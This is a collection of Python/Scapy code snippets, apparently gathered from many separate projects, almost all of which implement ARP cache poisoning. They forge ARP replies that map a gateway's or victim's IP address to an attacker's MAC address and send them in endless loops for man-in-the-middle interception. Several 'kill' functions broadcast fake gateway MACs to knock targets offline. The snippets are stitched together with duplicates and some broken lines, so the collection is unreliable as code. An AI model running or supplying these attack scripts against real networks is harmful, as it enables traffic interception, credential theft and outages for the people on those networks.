def PoisonARPCache(): # Constructing packet for Victim A frameA = Ether() frameA.src = ATTACKER_MAC frameA.dst = VICTIM_A_MAC arpA = ARP() arpA.hwsrc = ATTACKER_MAC arpA.psrc = VICTIM_B_IP arpA.pdst = VICTIM_A_IP arpA.op = 1 # Constructing packet for Victim B frameB = Ether() frameB.src = ATTACKER_MAC frameB.dst = VICTIM_B_MAC arpB = ARP() arpB.hwsrc = ATTACKER_MAC arpB.psrc = VICTIM_A_IP arpB.pdst = VICTIM_B_IP arpB.op = 1 packetA = frameA/arpA packetB = frameB/arpB while True: sendp(packetA) sendp(packetB) sleep(5)
def poison(self):
poison_victim = ARP()
poison_victim.op = 2
poison_victim.psrc = self.gateway
poison_victim.pdst = self.victim
poison_victim.hwdst = self.victimmac
print(f'ip src: {poison_victim.psrc}')
print(f'ip dst: {poison_victim.pdst}')
print(f'mac dst: {poison_victim.hwdst}')
print(f'mac src: {poison_victim.hwsrc}')
print('-' * 30)
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = self.victim
poison_gateway.pdst = self.gateway
poison_gateway.hwdst = self.gatewaymac
print(f'ip src: {poison_gateway.psrc}')
print(f'ip dst: {poison_gateway.pdst}')
print(f'mac dst: {poison_gateway.hwdst}')
print(f'mac src: {poison_gateway.hwsrc}')
print(poison_gateway.summary())
print('-' * 30)
print(f'Beginning the ARP posion. [Ctrl-c to stop]')
while True:
sys.stdout.write('.')
sys.stdout.flush()
try:
send(poison_victim)
send(poison_gateway)
except KeyboardInterrupt:
self.restore()
sys.exit()
else:
time.sleep(2)
def run(self):
debug('ARP cache poisoning thread waiting for victims...')
ip = q.get()
debug('Acquired first victim... %s' % ip)
pe = Ether(src=self.mac, dst=self.rmac)
pa = ARP(op='who-has', hwsrc=self.mac, psrc=ip, pdst=ip, hwdst=self.rmac)
oldmac = self.whohas(ip)
oldip = ip
while True:
try:
ip = q.get_nowait()
if oldmac is not None:
debug('Healing victim %s/%s' % (oldip, oldmac))
pa.psrc = oldip
pa.hwsrc = oldmac
sendp(pe/pa, verbose=0)
if ip is None:
break
else:
debug('Changing victim to %s...' % ip)
pa.psrc = ip
pa.hwsrc = self.mac
oldip = ip
oldmac = self.whohas(ip)
except Empty:
# Send the poison... all your base are belong to us!
sendp(pe/pa, verbose=0)
sleep(1/self.poison_rate)
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
# Verificar possibilidade de montagem dos pacotes a uma
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print("[*] Beginning the ARP poison. [CTRL-C to stop]")
while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
print("[*] ARP poison attack finished.")
return
def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
global poisoning
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print("[*] Beginning the ARP poison. [CTRL-C to stop]")
while poisoning:
send(poison_target)
send(poison_gateway)
time.sleep(2)
print("[*] ARP poison attack finished.")
return
def poison(self):
# 1) Setting-up/initializing details of victim. Will run/send packets later, in step 3.
# poison_victim is my variable but it takes on the FUNCTION ARP()
poison_victim = ARP()
poison_victim.op = 2 # Question. ( the other op we saw was op='who-is')
# I determine the SOURCE IP of the packet, as the gateway !! - Sneaky
poison_victim.psrc = self.gateway # why preceded by 'p' in pdst and psrc ??
poison_victim.pdst = self.victim
poison_victim.hwdst = self.victimmac
print(
f'ip src: {poison_victim.psrc} (ie the gateway - not my machine!')
print(f'ip dst: {poison_victim.pdst}')
print(f'mac dst: {poison_victim.hwdst}')
print(f'mac src: {poison_victim.hwsrc}'
) # Question: shouldn't this be set - it was not set yet.
print(poison_victim.summary())
print('-' * 30)
# 2) Setting-up/initializing details of gateway. Will run/send packets later, in step 3.
poison_gateway = ARP()
poison_gateway.op = 2 # Question. ( the other op we saw was op='who-is')
# I determine the SOURCE of the packet, as the victim/target !! - Sneaky
poison_gateway.psrc = self.victim
poison_gateway.pdst = self.gateway
poison_gateway.hwdst = self.gatewaymac
print(f'ip src: {poison_gateway.psrc}')
print(f'ip dst: {poison_gateway.pdst}')
print(f'mac dst: {poison_gateway.hwdst}')
print(f'mac_src: {poison_gateway.hwsrc}')
print(poison_gateway.summary())
print('-' * 30)
# 3)
print(
f'Beginning the ARP poison (ie sending the packets).Ffor 45 seconds.'
)
t_end = time.time() + 45 # 45 seconds
while time.time() < t_end:
#while True: # keep running the poison all the while we need to eavesdrop - until KeyboardInterrupt of ^C
sys.stdout.write(str(time.strftime("%H:%M:%S")) + "~")
sys.stdout.flush()
#try:
send(poison_victim)
send(poison_gateway)
# 4)
# except KeyboardInterrupt:
# self.restore()
# sys.exit()
# print('Performed "sys.exit()"')
#else:
time.sleep(2)
self.restore()
def poison(self):
'''Create poisoned packets and send them to the victim and the gateway'''
poison_victim = ARP()
poison_victim.op = 2 # ARP Reply
poison_victim.psrc = self.gateway
poison_victim.pdst = self.victim
poison_victim.hwdst = self.victimmac
print(f'Gateway, IP source: {poison_victim.psrc}'
) # Gateway's IP address
print(f'Victim, IP destiantion: {poison_victim.pdst}')
print(f'ATTACKER, MAC source: {poison_victim.hwsrc}'
) # Attacker's MAC address
print(f'Victim, MAC destination: {poison_victim.hwdst}')
print(poison_victim.summary())
print('~*~' * 15)
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = self.victim
poison_gateway.pdst = self.gateway
poison_gateway.hwdst = self.gatewaymac
print(f'Victim, IP source: {poison_gateway.psrc}'
) # Victim's IP address
print(f'Gateway, IP destiantion: {poison_gateway.pdst}')
print(f'ATTACKER, MAC source: {poison_gateway.hwsrc}'
) # Attacker's MAC address
print(f'Gateway, MAC destination: {poison_gateway.hwdst}')
print(poison_gateway.summary())
print('><(((º> ' * 15)
print(f'Begin the ARP poison. [CTRL-C to stop]')
# Respective's ARP caches entires remain posioned
while True:
# Dynamic packet printing:
sys.stdout.write('.') # Waiting on the terminal
sys.stdout.flush(
) # Flushes out the stdout buffer: it'll write everything in the buffer to the terminal
try:
# Attacker's NIC should allow IP Forwarding
send(poison_victim)
send(poison_gateway)
except KeyboardInterrupt:
# Restore ARP cache entires
self.restore()
sys.exit()
else:
time.sleep(2)
def defenseive_arps(GATEWAY_IP, GATEWAY_MAC):
un_poison_victim = ARP()
un_poison_victim.op = 2
un_poison_victim.psrc = gateway_ip
un_poison_victim.pdst = victim_L3
un_poison_victim.hwdst = GATEWAY_MAC
un_poison_gateway = ARP()
un_poison_gateway.op = 2
un_poison_gateway.psrc = victim_L3
un_poison_gateway.pdst = gateway_ip
un_poison_gateway.hwdst = victim_MAC
send(un_poison_victim)
send(un_poison_gateway)
time.sleep(2)
def poison(self):
"""
simple ARP poisoner.
- sets data up to poison victim and the gateway.
- first creates a poisoned ARP packet for the victim.
- second creates a poisoned ARP packet for the gateway.
- poisons the gateway by sending it to the victims IP address
but uses the attacker's MAC address.
- poisons the victim by sending the gateways IP address
but the attacker's MAC address.
[!] this program loops all of the above until the user cancels. [!]
[*] to stop loop CTRL-C [*]
"""
poison_victim = ARP()
poison_victim.op = 2
poison_victim.psrc = self.gateway
poison_victim.pdst = self.victim
poison_victim.hwdst = self.victim_mac
print(f'IP src: {poison_victim.psrc}')
print(f'IP dst: {poison_victim.pdst}')
print(f'MAC dst: {poison_victim.hwdst}')
print(f'MAC src: {poison_victim.hwsrc}')
print(poison_victim.summary())
print('-'*30)
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = self.victim
poison_gateway.pdst = self.gateway
poison_gateway.hwdst = self.gateway_mac
print(poison_gateway.summary())
print('-'*30)
print(f'Beginning the ARP poison. [CTRL-C to stop]')
while True:
sys.stdout.write('.')
sys.stdout.flush()
try:
send(poison_victim)
send(poison_gateway)
except KeyboardInterrupt:
self.restore()
sys.exit()
else:
time.sleep(2)
def restore_arp_table(dst, src):
arp_response = ARP()
arp_response.op = 2 # now it is a response
arp_response.pdst = dst
arp_response.hwdst = get_mac(dst)
arp_response.hwsrc = get_mac(src)
arp_response.psrc = src # 192.168.0.36
send(arp_response, count=10, verbose=False)
def arp_spoof(ip_to_spoof, pretend_ip):
arp_response = ARP()
arp_response.op = 2 # now it is a response
arp_response.pdst = ip_to_spoof
arp_response.hwdst = get_mac(ip_to_spoof)
arp_response.hwsrc = "00:0c:29:9d:e8:09"
arp_response.psrc = pretend_ip # 192.168.0.36
send(arp_response, verbose=False)
def __init__(self, ip, mac):
ether = Ether()
ether.src = mac # Default: network card mac
arp = ARP()
arp.op = arp.is_at
arp.psrc = ip
arp.hwsrc = mac
self.arp = arp
self.ether = ether
def spoof(from_ip, to_ip, spoofed_mac, hwdest=None):
if not hwdest:
## Broadcast if the mac address can't be retrieved
hwdest = getMacAddress(to_ip) or "ff:ff:ff:ff:ff:ff"
packet = ARP()
packet.hwdest = hwdest
packet.pdst = to_ip
packet.hwsrc = spoofed_mac
packet.psrc = from_ip
send(packet, verbose=0)
return hwdest
def __init__(self, ip, mac):
ether = Ether()
ether.src = mac # Default: network card mac
arp = ARP()
arp.op = arp.is_at
arp.psrc = ip
arp.hwsrc = mac
self.arp = arp
self.ether = ether
def create_arp_packet(target, victim):
a = ARP()
# target whose arp cache is to be poisoned
a.pdst = target
# attacker's MAC Address of assuming eth0
# get it from the system information
a.hwsrc = getHwAddr('eth0')
# victim's ip
a.psrc = victim
a.hwdst = "ff:ff:ff:ff:ff:ff"
return a
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
"""Poison target handler."""
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print("[*] Beginning the ARP poison. [CTRL-C to stop].")
while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
print("[*] ARP poison attack finished.")
return
def kill(targets, gateway_ip="192.168.1.1", nloop=True):
if targets is not list:
targets = [targets]
a = ARP()
a.psrc = gateway_ip
a.hwsrc = "2b:2b:2b:2b:2b:2b"
a.hwdst = "ff:ff:ff:ff:ff:ff"
while True:
for target in targets:
a.pdst = target
send(a)
if not nloop:
break
def kill(targets, gateway_ip="192.168.1.1", nloop=True):
if targets is not list:
targets = [targets]
a = ARP()
a.psrc = gateway_ip
a.hwsrc = "2b:2b:2b:2b:2b:2b"
a.hwdst = "ff:ff:ff:ff:ff:ff"
while True:
for target in targets:
a.pdst = target
send(a)
if not nloop:
break
def run(self):
debug('ARP cache poisoning thread waiting for victims...')
ip = q.get()
debug('Acquired first victim... %s' % ip)
pe = Ether(src=self.mac, dst=self.rmac)
pa = ARP(op='who-has',
hwsrc=self.mac,
psrc=ip,
pdst=ip,
hwdst=self.rmac)
oldmac = self.whohas(ip)
oldip = ip
while True:
try:
ip = q.get_nowait()
if oldmac is not None:
debug('Healing victim %s/%s' % (oldip, oldmac))
pa.psrc = oldip
pa.hwsrc = oldmac
sendp(pe / pa, verbose=0)
if ip is None:
break
else:
debug('Changing victim to %s...' % ip)
pa.psrc = ip
pa.hwsrc = self.mac
oldip = ip
oldmac = self.whohas(ip)
except Empty:
# Send the poison... all your base are belong to us!
debug('Poisoning %s...' % ip)
sendp(pe / pa, verbose=0)
sleep(1 / self.poison_rate)
def poison(self):
poison_victim = ARP()
poison_victim.op = 2
poison_victim.psrc = self.gateway_ip
poison_victim.pdst = self.victim_ip
poison_victim.hwdst = self.victim_mac
print(f'IP source: {poison_victim.psrc}')
print(f'MAC source: {poison_victim.hwsrc}')
print(f'IP destination: {poison_victim.pdst}')
print(f'MAC destination: {poison_victim.hwdst}')
print(poison_victim.summary())
print('-' * 30)
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = self.victim_ip
poison_gateway.pdst = self.gateway_ip
poison_gateway.hwdst = self.gateway_mac
print(f'IP source: {poison_gateway.psrc}')
print(f'MAC source: {poison_gateway.hwsrc}')
print(f'IP destination: {poison_gateway.pdst}')
print(f'MAC destination: {poison_gateway.hwdst}')
print(poison_gateway.summary())
print('-' * 30)
print('Beginning the ARP poison. [CTRL-C to stop]')
while True:
sys.stdout.write('.')
sys.stdout.flush()
try:
send(poison_victim)
send(poison_gateway)
except KeyboardInterrupt:
self.restore()
sys.exit()
else:
time.sleep(2)
def poison(self):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = self.gateway
poison_target.pdst = self.target
poison_target.hwdst = self.target_mac
printf(f'IP Src: {poison_target.psrc}')
printf(f'IP Dst: {poison_target.dst}')
printf(f'MAC Dst: {poison_target.hwdst}')
printf(f'MAC Src: {poison_target.hwsrc}')
print(poison_target.summary())
print('-' * 30)
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = self.target
poison_gateway.pdst = self.gateway
poison_gateway.hwdst = self.gateway_mac
printf(f'IP Src: {poison_gateway.psrc}')
printf(f'IP Dst: {poison_gateway.dst}')
printf(f'MAC Dst: {poison_gateway.hwdst}')
printf(f'MAC Src: {poison_gateway.hwsrc}')
print(poison_gateway.summary())
print('-' * 30)
print(f'Beginning ARP Poison. [Press Ctrl-C to stop]')
while time.time() < TIME_LIMIT:
sys.stdout.write('.')
sys.stdout.flush()
try:
send(poison_target)
send(poison_gateway)
except KeyboardInterrupt:
self.restore()
sys.exit()
else:
time.sleep(2)
def arp_attack():
arpFake = ARP()
psrc = get_gate_way()
pdst = get_broadcast()
hwsrc = get_mac_address()
arpFake.psrc = psrc
arpFake.pdst = pdst
arpFake.hwsrc = hwsrc
arpFake.op = 2
while 1:
send(arpFake)
print 'arp send'
def poison_target(gateway_ip,target_ip,gateway_mac,target_mac):
global poisoning
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print "**ARP poisoning underway...ETX to stop"
while poisoning:
send(poison_target)
send(poison_gateway)
time.sleep(2)
print "**ARP poisoning has finished..."
return
def poison_target(self):
target_poison_packet = ARP()
target_poison_packet.op = 2
target_poison_packet.psrc = self._arg["gateway_ip"]
target_poison_packet.pdst = self._arg["target_ip"]
target_poison_packet.hwdst = self._arg["target_mac"]
gateway_poison_packet = ARP()
gateway_poison_packet.op = 2
gateway_poison_packet.psrc = self._arg["target_ip"]
gateway_poison_packet.pdst = self._arg["gateway_ip"]
gateway_poison_packet.hwdst = self._arg["gateway_mac"]
self.poisoning = True
print("[*] Beginning the ARP poison. [CTRL-C to stop]")
while self.poisoning:
send(target_poison_packet)
send(gateway_poison_packet)
time.sleep(2)
print("[*] ARP poison attack finished")
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print '[*] Beginning the ARP poison.'
while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
print '[*] ARP poison attack finished.'
return
def arp_attack():
apr_spoof = ARP()
psrc = get_gate_way()
pdst = get_broadcast()
hwsrc = get_mac_address()
apr_spoof.psrc = psrc
apr_spoof.pdst = pdst
apr_spoof.hwsrc = hwsrc
apr_spoof.op = 2
while 1:
send(apr_spoof)
print 'arp sent'
def arpspoof_via_scapy(impersonated_host, victim_ip):
from scapy.all import ARP, IP, send, srp, sr1, conf
# Note that we're using scapy, so the ARP spoof shutdown code knows it needs to send
# corrective ARP replies.
ml.arpspoof_via_scapy = 1
pid = os.fork()
if pid:
ml.jjlog.debug("Forking to handle arpspoofing via process %d\n" % pid)
# Let's add this process to a list of child processes that we will need to
# explicitly shut down.
ml.child_pids_to_shutdown.append(pid)
else:
# Turn off scapy's verbosity?
conf.verb = 0
# Build an ARP response to set up spoofing
arp_response = ARP()
# define a constant for ARP responses
const_ARP_RESPONSE = 2
# Set the type to a ARP response
arp_response.op = const_ARP_RESPONSE
# Hardware address we want to claim the packet
arp_response.hwsrc = ml.my_mac
# IP address we want to map to that address
arp_response.psrc = impersonated_host
# Now set the ARP response target
non_broadcast = 0
if non_broadcast:
# MAC address and IP address of our victim
arp_response.hwdst = lookup_mac_via_scapy(victim_ip)
arp_response.pdst = victim_ip
else:
arp_response.hwdst = "ff:ff:ff:ff:ff:ff"
arp_response.pdst = ml.my_broadcast
# Issue the ARP response every 5 seconds
while (1):
send(arp_response)
sleep(3)
print "Arpspoofing dying"
exit
def arpspoof_via_scapy(impersonated_host, victim_ip):
from scapy.all import ARP,IP,send,srp,sr1,conf
# Note that we're using scapy, so the ARP spoof shutdown code knows it needs to send
# corrective ARP replies.
ml.arpspoof_via_scapy = 1
pid = os.fork()
if pid:
ml.jjlog.debug("Forking to handle arpspoofing via process %d\n" % pid)
# Let's add this process to a list of child processes that we will need to
# explicitly shut down.
ml.child_pids_to_shutdown.append(pid)
else:
# Turn off scapy's verbosity?
conf.verb=0
# Build an ARP response to set up spoofing
arp_response = ARP()
# define a constant for ARP responses
const_ARP_RESPONSE = 2
# Set the type to a ARP response
arp_response.op = const_ARP_RESPONSE
# Hardware address we want to claim the packet
arp_response.hwsrc = ml.my_mac
# IP address we want to map to that address
arp_response.psrc = impersonated_host
# Now set the ARP response target
non_broadcast=0
if non_broadcast:
# MAC address and IP address of our victim
arp_response.hwdst = lookup_mac_via_scapy(victim_ip)
arp_response.pdst = victim_ip
else:
arp_response.hwdst = "ff:ff:ff:ff:ff:ff"
arp_response.pdst = ml.my_broadcast
# Issue the ARP response every 5 seconds
while(1):
send(arp_response)
sleep(3)
print "Arpspoofing dying"
exit
def sendPackets(gateway_ip, target_ip, this_mac_address, target_mac_address):
arp = ARP()
arp.psrc = gateway_ip
arp.hwsrc = this_mac_address
arp = arp
arp.pdst = target_ip # (say IP address of target machine)
arp.hwdst = target_mac_address # target mac
ether = Ether()
ether.src = this_mac_address
ether.dst = target_mac_address
arp.op = 2
def broadcast():
packet = ether / arp
sendp(x=packet, verbose=True)
broadcast()
def run(self):
debug('ARP cache poisoning thread waiting for victims...')
ip = q.get()
debug('Acquired first victim... %s' % ip)
pe = Ether(src=self.mac, dst=self.rmac)
pa = ARP(op='is-at', hwsrc=self.mac, psrc=ip, hwdst=self.rmac)
while True:
try:
ip = q.get_nowait()
if ip is None:
break
else:
debug('Changing victim to %s...' % ip)
pa.psrc = ip
except Empty:
# Send the poison... all your base are belong to us!
sendp(pe/pa, verbose=0)
sleep(1/self.poison_rate)
def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
ether = Ether()
ether.src = my_mac
arp = ARP()
arp.psrc = gateway_ip
arp.hwsrc = my_mac
arp = arp
arp.pdst = target_ip
arp.hwdst = target_mac
ether = ether
ether.src = my_mac
ether.dst = target_mac
arp.op = 2
def broadcastPacket():
packet = ether / arp
sendp(x=packet, verbose=False)
broadcastPacket()
def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
ether = Ether()
ether.src = my_mac
arp = ARP()
arp.psrc = gateway_ip
arp.hwsrc = my_mac
arp = arp
arp.pdst = target_ip
arp.hwdst = target_mac
ether = ether
ether.src = my_mac
ether.dst = target_mac
arp.op = 2
def broadcastPacket():
packet = ether / arp
sendp(x=packet, verbose=False)
broadcastPacket()
def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
# Function for sending the malicious ARP packets out with the specified data
ether = Ether()
ether.src = my_mac
arp = ARP()
arp.psrc = gateway_ip
arp.hwsrc = my_mac
arp = arp
arp.pdst = target_ip
arp.hwdst = target_mac
ether = ether
ether.src = my_mac
ether.dst = target_mac
arp.op = 2
packet = ether / arp
sendp(x=packet, verbose=False)
exit(0)
poor_client_ip = sys.argv[1]
gateway_ip = sys.argv[2]
my_hardware = '11:11:11:11:11:11'
# Build arp packages
#
# attacker > poor_client
"""
arp_poor_client = ARP(op='who-has')
arp_poor_client.psrc = gateway_ip
arp_poor_client.hwsrc = my_hardware
arp_poor_client.pdst = poor_client_ip
arp_poor_client.hwdst = 'ff:ff:ff:ff:ff:ff'
"""
arp_poor_client = ARP(op='is-at')
arp_poor_client.psrc = '192.168.43.1'
arp_poor_client.hwsrc = my_hardware
arp_poor_client.pdst = poor_client_ip
arp_poor_client.hwdst = 'ff:ff:ff:ff:ff:ff'
while (1):
send(arp_poor_client)
sleep(1)
#!/usr/bin/python import sys from scapy.all import ARP,send a=ARP() a.hwsrc="aa:aa:aa:aa:aa:aa" #a.psrc="192.168.1.93" #a.hwdst="d4:be:d9:dc:4c:20" #a.pdst="192.168.1.12" #a.hwdst="00:00:00:00:00:00" #a.pdst="0.0.0.0" a.psrc="0.0.0.0" a.hwdst="ff:ff:ff:ff:ff:ff" a.pdst="255.255.255.255" send(a)